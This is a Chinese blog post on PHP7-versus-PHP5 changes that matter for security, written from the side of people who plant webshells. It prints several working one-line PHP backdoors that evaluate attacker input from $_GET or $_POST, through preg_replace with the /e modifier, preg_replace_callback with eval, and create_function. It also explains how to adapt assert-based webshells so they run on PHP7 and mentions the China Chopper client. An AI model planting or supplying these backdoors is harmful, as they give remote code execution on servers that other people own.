美文网首页
PHP7和PHP5上的安全区别

PHP7和PHP5上的安全区别

作者: __周__ | 来源:发表于2019-07-08 10:09 被阅读0次
  • preg_replace()不再支持/e修饰符

利用\e修饰符执行代码的后门大家也用了不少了,具体看官方的这段描述:

如果设置了这个被弃用的修饰符, preg_replace() 在进行了对替换字符串的 后向引用替换之后, 将替换后的字符串作为php 代码评估执行(eval 函数方式),并使用执行结果 作为实际参与替换的字符串。单引号、双引号、反斜线()和 NULL 字符在 后向引用替换时会被用反斜线转义.

preg_replace()利用\e的几个tips

PHP5:
<?php preg_replace("/.*/e",$_GET["h"],".");?>

PHP7:
<?php preg_replace_callback("/.*/",function ($a){@eval($a[0]);},$_GET["h"]);?>

OR:

<?php
function backdoor($a)
{
  // 通常: $a[0]是完成的匹配
  // $a[1]是第一个捕获子组的匹配
  // 以此类推
  return eval($a[0]);
}
echo preg_replace_callback("/.*/",backdoor,$_GET["z"]);
?>
  • create_function()被废弃

<?php
$func =create_function('',$_POST['cmd']);$func();
?>
  • unserialize()增加一个可选白名单参数

略过。。

  • assert()默认不再可以执行代码

这就是众多马不能用的罪魁祸首了,太多的马用assert()来执行代码了,这个更新基本就团灭,一般情况下修改成eval即可正常运行了~

提一下,菜刀在实现文件管理器的时候用的恰好也是assert函数,这导致菜刀没办法在PHP7上正常运行。

  • 十六进制字符串不再被认为是数字

这个修改一出,以后CTF套路会少很多啊~
很多骚操作都不能用了~

  • 不向后兼容的变更(移除了 ASP 和 script PHP 标签)

现在只有<?php ?>这样的标签能在php7上运行


图片.png
  • 移除&ltscript language="php"&gt;和&lt;%这两种另类的php标签
  • 飞起容易导致变量附带的无第二个参数的parse_str

相关文章

  • PHP7和PHP5上的安全区别

    preg_replace()不再支持/e修饰符 利用\e修饰符执行代码的后门大家也用了不少了,具体看官方的这段描述...

  • 安装PHP5、安装php7

    安装PHP5 安装PHP5 模块随用随取 安装php7 安装php7 查看php相关 更改Apache使用的php...

  • PHP7使用MongoDB

    PHP7与PHP5使用的MongoDB不一样,还在使用PHP5的是用不上 安装MongoDB拓展 执行成功后,会输...

  • PHP7垃圾回收机制

    前面一篇文章我们聊了下PHP5的垃圾回收机制,本篇文章再来聊下PHP7的垃圾回收机制。PHP7的速度比PHP5快了...

  • centos lanmp环境php5升级为php7

    centos lanmp环境php5升级为php7 更新yum repo 卸载现有版本的php 安装新的php7及...

  • 安装PHP5、安装PHP7

    目录 一、安装PHP5二、安装PHP7 一、安装PHP5 下载源码包 解压 初始化 --prefix 指定安装目录...

  • 一篇写给准备升级PHP7的小伙伴的文章

    前言 本文是一篇讲座听后+后续研究的总结。话说当年追时髦,php7一出就给电脑立马装上了,php5和php7共存,...

  • PHP7和PHP5的区别以及特性

    PHP7相对于PHP5性能提升 1、变量存储字节减小,减少内存占用,提升变量操作速度 2、改善数组结构,数组元素和...

  • php7与php5底层区别

    1. 抽象语法树 php7之前的版本,直接将php代码在语法解析阶段生成ZendVM指令, 编译器和执行器是耦合在...

  • PHP7 为什么变快了?

    PHP7比PHP5在性能上有很大的提升那么PHP7做了那些优化?变量存储优化 1.存储变量的结构体变小,结构体成员...

网友评论

      本文标题:PHP7和PHP5上的安全区别

      本文链接:https://www.haomeiwen.com/subject/qfyufctx.html